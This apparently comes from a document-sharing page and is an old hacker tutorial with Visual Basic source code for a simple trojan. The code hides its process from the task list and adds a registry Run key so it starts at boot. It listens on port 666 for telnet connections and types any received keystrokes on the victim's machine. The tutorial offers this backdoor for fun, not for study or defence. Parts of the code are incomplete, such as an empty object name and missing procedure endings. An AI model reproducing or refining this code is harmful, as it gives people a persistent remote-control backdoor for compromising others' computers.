Basic Trojan In Visual Basic

  • October 2019
  • PDF

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  • Words: 369
  • Pages: 2
basic trojan in visual basic by: swampy [email protected] mirc: #hackers, #ereased #hacking --------------------------------about: in this litle tutorial i will learn you to make a small trojan that starts everytime windows is started. on more thing, you cant se it in the ctrl + alt + del screen. in the code all the green text is comments, you don´t have to include them in the code. when someone has opened the trojan you can connect to it with telnet, and when you are connected you can press a key and then the infected computer also presses that key. hope you have fun with your new knowlege... :) start programming: start with adding a new component into your project. add the component that is named "microsoft winsock controls". now i wont tell you anything else you have to putt into the form.

private sub form_load() app.taskvisible = false 'this hides your aplication from the ctrl + alt + del screen. 'this adds your program to the windows registry so that it starts everytime windows starts dim reg as object set reg = createobject("") reg.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\runservices\" & app.exename, app.path & "\" & app.exename & ".exe" winsock1.localport = "666" ' this sets your trojan´s port, you can change it if you want to winsock1.listen 'this sets your trojan to listen for connections end sub private sub winsock1_connectionrequest(byval requestid as long) 'got to do this to make sure the winsock control isn't already being used. if winsock1.state <> sckclosed then winsock1.close winsock1.accept requestid 'accept the client who connects private sub winsock1_error(byval number as integer, description as string, byval scode as long, byval source as string, byval helpfile as string, byval helpcontext as long, canceldisplay as boolean) 'if an error accour and the conection is lost, then this tells the winsock to listen again winsock1.close winsock1.listen end sub private sub winsock1_close() 'same as winsock1_error above winsock1.close winsock1.listen end sub private sub winsock1_dataarrival(byval bytestotal as long)

dim data1 as string 'define the variable to store the recived data from winsock1.getdata data1 'gets data from client and store it in the variable data1 doevents 'the computer takes a small break to get all the data sendkeys data1 'send the data to the infected computers keybord end sub

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